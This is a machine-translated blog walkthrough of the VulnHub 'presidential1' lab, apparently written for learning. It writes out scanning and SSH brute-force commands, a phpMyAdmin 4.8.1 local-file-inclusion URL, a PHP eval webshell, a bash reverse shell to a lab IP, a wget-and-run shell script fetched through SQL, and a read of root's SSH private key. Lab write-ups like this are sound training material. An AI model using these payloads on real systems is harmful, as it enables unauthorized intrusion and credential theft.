当前位置:网站首页>【vulnhub】presidential1
【vulnhub】presidential1
2022-07-07 00:20:00 【Happy star】
Blog home page : Happy star The blog home page of
Series column :vulnhub
Welcome to focus on the likes collection ️ Leaving a message.
Starting time :2022 year 7 month 6 Japan
The author's level is very limited , If an error is found , Please let me know , thank !
Navigation assistant
- The host found
- Port scanning
- visit 80 port
- dirb Directory scanning
- nikto and whatweb To collect information
- dirsearch Scan the directory again
- Try to login with the obtained account and password ssh service
- cewl Crawl dictionary
- hydra Blast ssh
- Subdomain explosion
- Log in to the database
- john Crack the code
- Try to use admin Sign in ssh( Failure )
- phpmyadmin Vulnerability penetration
- Raise the right
Because the target plane is host-only Pattern
We will kali It's also set to host-only Pattern
The host found
arp-scan -l
If the host number is too large or too small, throw it away , Because it may be a gateway or something
So the target ip by 192.168.110.128
Port scanning
nmap -sV -p- 192.168.110.128
visit 80 port

See information about someone's name , You may need to use cwel
dirb Directory scanning
dirb http://192.168.110.128
assets Catalog , Let's take a look at 
Website source code , See if you have scanned sensitive files , I didn't find any sensitive files
cgi-bin Catalog 403
nikto and whatweb To collect information
whatweb 192.168.110.128
nikto --url 192.168.110.128
Visit config.php, There is indeed this file , But it's empty
Then try whether it's a backup file config.phps 、config.php.bak

visit icons/README
All of a sudden dirb There was suspicion , Why are these files not scanned
dirsearch Scan the directory again
./dirsearch.py -u http://192.168.110.128 
It does config.php.bak
Because I thought it would download automatically , I didn't check the source code 
Get the account and password of the database
open about.html
Other sections cannot be accessed , Only HOME and ABOUT
So this page is a static page
Try to login with the obtained account and password ssh service
ssh -p 2082 [email protected]
I don't know what's going on
cewl Crawl dictionary
cewl http://192.168.110.128 -w dic0.txt
hydra Blast ssh
hydra -L dic0.txt -P dic0.txt ssh://192.168.110.128
Look at this error message , And above votebox Error message
It should require a key , Instead of using passwords directly
Subdomain explosion
There is no more information to use
Explode subdomains
But now we only have servers ip Address , There is no domain name 
So the domain name of the website is votenow.local
change host file
vim /etc/hosts
192.168.110.128 votenow.local
Want to use gobuster、oneforall To blow up the subdomain , But they are not well configured
Use wfuzzwfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local
stay Prime1 Drone aircraft fuzz Parameters are used ,-w Specify a dictionary ,-H Specify the request header , --hw and --hc Is the result of removing the response to a specified length 
Get a subdomain datasafe
write in hosts file
vim /etc/hosts
192.168.110.128 datasafe.votenow.local
Log in to the database

Log in with the obtained database account 

Got it admin And password
john Crack the code
【Try to Hack】john Hash cracking tool

obtain admin The password for Stella
Try to use admin Sign in ssh( Failure )
ssh -p 2082 [email protected]
You really need a certificate
phpmyadmin Vulnerability penetration

Tell us the version number 4.8.1searchsploit phpmyadmin
cp /usr/share/exploitdb/exploits/php/webapps/50457.py /root 
This RCE Of CVE I don't know how to use it
Follow others to use the file to include a copy
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1) | php/webapps/44924.txt
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2) | php/webapps/44928.txt
searchsploit -x php/webapps/44928.txt

structure urlhttp://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_d4qpkliuhiq1anqdkqgc8v10qnq5teq8

It reappears successfully
Now we can write a sentence, Trojan horse <?php eval($_GET["ant"]); ?>
select "<?php echo file_put_contents('/var/www/html/s.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsiYW50Il0pOyA/Pg=='));exit;?>"
There may be something wrong with finding this , Not even , Direct rebound shellcd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.110.129/1100 0>&1' > shell.shpython -m SimpleHTTPServer 80nc -lvvp 1100
perform sqlselect '<?php system("wget 192.168.110.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'
Get an interactive shellpython -c 'import pty; pty.spawn("/bin/bash")'
Raise the right
su admin
tarS -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082
end
边栏推荐
- GPIO简介
- 一图看懂对程序员的误解:西方程序员眼中的中国程序员
- Devops can help reduce technology debt in ten ways
- (leetcode) sum of two numbers
- How can computers ensure data security in the quantum era? The United States announced four alternative encryption algorithms
- App general function test cases
- Encryption algorithm - password security
- 2021 SASE integration strategic roadmap (I)
- DevOps可以帮助减少技术债务的十种方式
- Geo data mining (III) enrichment analysis of go and KEGG using David database
猜你喜欢

Racher integrates LDAP to realize unified account login

Automatic test tool katalon (WEB) test operation instructions

陀螺仪的工作原理

File and image comparison tool kaleidoscope latest download

Liuyongxin report | microbiome data analysis and science communication (7:30 p.m.)

沉浸式投影在线下展示中的三大应用特点

Designed for decision tree, the National University of Singapore and Tsinghua University jointly proposed a fast and safe federal learning system
![[automated testing framework] what you need to know about unittest](/img/4d/0f0e0a67ec41e41541e0a2b5ca46d9.png)
[automated testing framework] what you need to know about unittest

Testers, how to prepare test data

什么是响应式对象?响应式对象的创建过程?
随机推荐
智能运维应用之道,告别企业数字化转型危机
web渗透测试是什么_渗透实战
File and image comparison tool kaleidoscope latest download
[automated testing framework] what you need to know about unittest
Operation test of function test basis
Encryption algorithm - password security
Everyone is always talking about EQ, so what is EQ?
MIT 6.824 - raft Student Guide
[2022 the finest in the whole network] how to test the interface test generally? Process and steps of interface test
openresty ngx_ Lua subrequest
DAY FIVE
Wechat applet UploadFile server, wechat applet wx Uploadfile[easy to understand]
一图看懂对程序员的误解:西方程序员眼中的中国程序员
Rider离线使用Nuget包的方法
DAY SIX
Clipboard management tool paste Chinese version
Use source code compilation to install postgresql13.3 database
What can the interactive slide screen demonstration bring to the enterprise exhibition hall
为什么完全背包要用顺序遍历?简要解释一下
Data operation platform - data collection [easy to understand]